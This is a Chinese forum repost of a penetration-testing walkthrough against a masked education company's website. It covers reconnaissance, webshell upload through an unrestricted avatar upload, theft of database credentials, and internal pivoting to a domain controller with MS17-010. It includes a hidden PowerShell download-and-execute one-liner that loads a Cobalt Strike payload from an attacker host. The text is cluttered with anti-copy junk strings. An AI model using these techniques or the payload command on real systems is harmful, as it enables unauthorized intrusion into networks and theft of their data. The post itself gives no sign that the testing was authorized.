中国网络渗透测试联盟

标题: 渗透实战 | 从外网直接打到内网全过程 [打印本页]
作者: admin    时间: 2024-3-1 19:41
标题: 渗透实战 | 从外网直接打到内网全过程

9 Z" m n4 k( {" i/ \& N; L% x 这次渗透是一个从01,从外网到拿下域控的实战过程,希望可以给大家一些思路% p$ ]2 w' b2 v$ c! b; c. J

/ S D6 G' `/ R+ a s

+ m; Q0 l$ Q# T1 b2 W. Q  6 a5 {4 D; F- _

8 ^0 b u- g" ?; H1 S

+ i, |+ F3 [* O& R' J 正文8 h4 ~" F5 B) ^2 U$ Q; w, S

3 J) v7 l( I2 E% K5 {

3 N) k/ a: L$ I/ U0 J' z  1 [" Q' _$ P/ i: L

/ K% u& T& ?) C! A. I

0 X! K% b2 q$ o 目标:www.xxxx.com(一家教育机构)
1 z' e' [. m' x5 m# M 打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能 5 O; n: p" Q4 s8 @3 D5 ?" [

7 P+ T; O2 \# G# ]; ]

4 @2 u0 d: j! D4 e vshapes= ; ^+ F2 V8 k. f, t: @" \$ s& x

( t* H" t2 ~$ l4 k4 u+ Z

+ u; B9 X0 G0 W 进行了简单的信息搜集
3 ]+ Z [. Y! }! {+ l. k+ ~! @
# K- ]) n& t( Z, [- D; A# [" c+ N$ i. I0 N

3 ?* z% }9 ^% \6 b" I1 l

( u: h. [0 o6 l 子域名搜集+ |9 L3 a8 o5 A

0 j3 Z+ T* {" R$ d) h

5 i" q1 q8 D: N, \/ }5 Z* j! b vshapes=9 p o, j6 k7 e

$ H' g' e$ a* @5 e9 D' O8 x

+ k7 e# U1 t, V, ^( t' U- B fofa找资产
4 N( v0 ^ u7 M, n* M/ z$ M$ f
1 b8 n$ S7 s' A- G) _: W7 E( B7 h; C# N# C, F

8 f4 ]' w& V: t3 p6 S' W t

2 \; {8 p% F, i( L9 o vshapes= . c# T+ U4 y' I

" b( ]8 m }" O0 i! Z1 Y

( K% e$ `6 S S* X% ~/ N 一共七个资产。去重之后只有两个。
: Q9 Q$ W7 C# J5 n' J3 w! T
; U$ d2 P0 p& M' B6 B$ M5 H 7 H" h2 v8 i; r

# D- X7 e3 O- `, ~7 p3 y

7 E0 r% @- m5 `3 q+ {/ }& U% v 目录探测, f( F' V# D9 o0 k. S" K+ i

: F! R. e& r. C$ h3 u

6 F h( k# |1 ~$ O4 R1 | vshapes=2 _! B/ }# ]1 X/ V

1 T* W+ B5 ~% A' V( A2 b- Y

: I6 J$ [) w9 q- P+ D+ _ 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
% f6 B# J9 k0 r3 K/ s* A
+ y2 Q+ m% l) u* q* R/ m+ l* ~ ( {* `$ P) ?* y- ^

: S. r+ K6 |3 T6 | t1 ]$ h

) p5 e8 Y; D, `+ D9 z8 X2 G 我又尝试了通过修改返回包来绕过登录界面8 N! P% y- z- Y1 @8 A$ \9 b

d' M, y8 G* t' L' z$ G

5 r7 _- P" I' p5 x0 L4 u* r! ]* H vshapes= ; J/ P" \" f0 g: @* F1 ~

/ ~. ~+ a/ c7 z

. o1 E; p, ?0 I. Q 还是不行,尝试注入无果1 z$ i0 {6 H8 u" M7 l C

' D8 {2 R4 F9 n9 P( L

1 D/ Q4 B6 n+ N2 B! j vshapes=5 i# [7 d2 [! W4 {

2 C% T p P+ ?0 x! U

! u$ i" z+ J& g/ M- G1 z, q8 K* [/ R d 不过我目录探测出了一处Spring信息泄露
# I8 R- `1 E+ d+ ^' m% x
' {1 N* Q5 W& G* J S% T ' A2 Z, ^5 A0 k X

4 a3 M: ]1 h& Z+ P6 x* Y& v) X$ g

6 y; s [3 g) `; Y J- r U vshapes= ( `% q( L6 w: b0 i

2 x6 t8 Q* k' S% V, w) k7 j2 y+ n

/ W: n6 E0 X, L4 F& K 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录 . ~$ s3 |7 ]6 t+ r( h

. N1 l* j' K+ a/ H0 K

) E- O* [, u* R vshapes= : o* _ `" L9 e& N8 e4 L

- `5 P% g& o4 [5 r. [. d' M

P5 f g3 w J( Y 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。 0 |' @/ `% ~0 e

: ?9 {, X' F& Y+ j7 M

7 @- U. O1 S) f& { I vshapes=: D$ U; _* _% p" t- M

; g! f- B& A# m0 y

+ b/ | L& }4 r c: n8 Q% ~ 获取有些师傅到这一步就手机抓包电脑测了。 - V" U( ?; ]$ b2 J& h

/ t. E: i* H7 }# S3 n& z

3 J K7 e% S- j( r% U q Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。 ! A; n+ i, C6 [& w# Y) _

: M& c' ]9 W+ M" f

7 J. q$ x. f4 u' j 其中在一个公众号发现了小程序,可以进行注册。+ g) T# @" P ~

* G o! H$ |! k

; @; y+ d0 t. d1 O2 r 看到了头像上传,尝试上传获取WebShell5 f9 J) A" z0 n* _ g1 b( W9 K

, P6 P0 \ L# }) x9 z

+ b9 s* M2 u% c6 ? vshapes= % K4 ~ ?$ m% g& ^% z

8 }# _6 K- n; ?+ O# y

5 \8 | H ~ _9 C! N4 ` 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问' T( r6 E+ y7 X3 L5 |5 Q8 }2 j

1 ]( f, N& y/ O

5 E q- T+ w2 z6 @& u# l! A8 o7 T" w5 r vshapes= ! k5 F }' I G) [1 w6 i

+ @" @+ `/ W9 j, k. Y

7 A! P, d( ~1 V$ t' n; m7 H 然后上了大马 ' o7 @5 F; e' y0 u

9 H" R9 r- x; |5 F* x- J F$ R5 H

/ D" P+ G/ _, F4 E3 B5 R vshapes=! J6 f) i( I- C3 r7 \

, x5 w% d6 F' n! \3 o1 V

* ~5 `. P5 v: G0 y vshapes=( n8 X _/ p$ Q! S& y

: X$ g8 F' R; h7 M' T

' g1 x9 l. a# J) d3 }8 J$ n. e 通过翻找文件发现数据库账号密码 7 f% M: L/ ^9 R' o! c

$ B2 N7 s1 W0 [( p# S$ Y' w

* E* e" O, p% B: X4 v& D5 K vshapes= , d4 j3 h8 e* R! x4 Y+ Q

. W# }% [0 ~' P. W# G

$ T1 M1 G$ S5 \6 \* ?% c --内网渗透0 f* v( G6 [2 u6 {( I6 N& R/ S

1 g) n% c4 a6 S8 X

# w' m: V8 ^: ^/ ]9 z 直接通过powershell执行 cs上线 + d( A, D2 Y* l0 b8 D

% L2 v9 L" a! B

+ r) P5 e5 b2 E( c powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))" & U: h& g# c$ x i0 b1 T$ u7 c% C: y0 m

. N* f3 q1 n. h

, _) m0 b8 H0 |% x+ X vshapes= 2 }1 [/ i D# F9 ~

& v. ` C8 {4 a5 q. }& L# ~, `! x

7 N- P& @, M5 C, c, g' ]7 y. O 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破 ! I9 V; B2 s1 V6 C* x7 `! c0 x+ y

' \- I; y/ K6 W0 V+ R& |- H

7 t) E) g. `5 U4 F2 ? vshapes= 0 w% Y5 U/ w# Z7 s

1 J' m1 W2 Z, z3 O' I' F

2 Z# e3 @5 g" c7 c0 E" W8 P 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
; {( ^0 s! Q2 M m$ F6 |
/ M9 t# V, n9 r1 f
+ b% `( c# t4 q0 x# @ 4 P' T0 A$ p1 m- S8 x, O0 z

V3 d- s! s6 B

' D; t/ [% Z. U2 {: m0 c vshapes=/ D* g! Q3 \# N6 ~! g4 {& V

' d& Z, A" [$ |" V+ `: N& K

, M$ A# c4 Z6 O) z+ G k 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
& |& M* B+ v3 {2 u, c4 U0 t
+ J* W0 E, s+ c& p+ C9 o) o 7 X, \' ~9 D. W% `$ H

$ [/ U( q# X+ C1 o0 E9 L- H

% Z: _5 N( p' A5 b8 S. B vshapes=' D6 T" w; J4 z: [7 a

- T9 h1 F- l2 q% R0 ^

/ Y; e2 @' [$ d
' z D, o0 H" L: [/ ^, i- b- E
- Q5 W& H! H' \( t+ R$ E : k5 S6 L* ?: z8 g# y* o

& _0 g6 D; ?9 }

4 p' Z2 H+ I- b7 T6 E) q   " {9 c f0 k2 T, P3 t0 s

, i, M. z& t8 \5 T5 X

3 S. |! ~4 w0 v& R 小结 4 v. j& z3 O- y- Y& I9 o

& P5 ?, y8 `% }' g7 F

0 P$ n" \8 u+ |$ A" ]5 k. S   # `6 }; x2 \% r c* B

v1 b# A2 \4 i2 p

9 ^+ z5 T. w# O' U) r 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路! 0 I3 Z6 K9 s) u r5 D9 t

% \0 Y# L8 D3 g; O$ P% O$ M7 v/ ~2 L

* K( n4 x R9 P9 i  ' I! N6 T" \: w4 M4 _/ k

: o5 E* ^) z5 m; a( \' e% |3 o; s$ c

. ?$ x* m1 F& {9 n' N( S 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html! H {, Y7 L; I

' k4 E: K' }* a8 V: I; U s: v

2 F# E4 s# H2 p5 |7 z   4 \% g9 _6 b; J( F3 S1 a- I





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2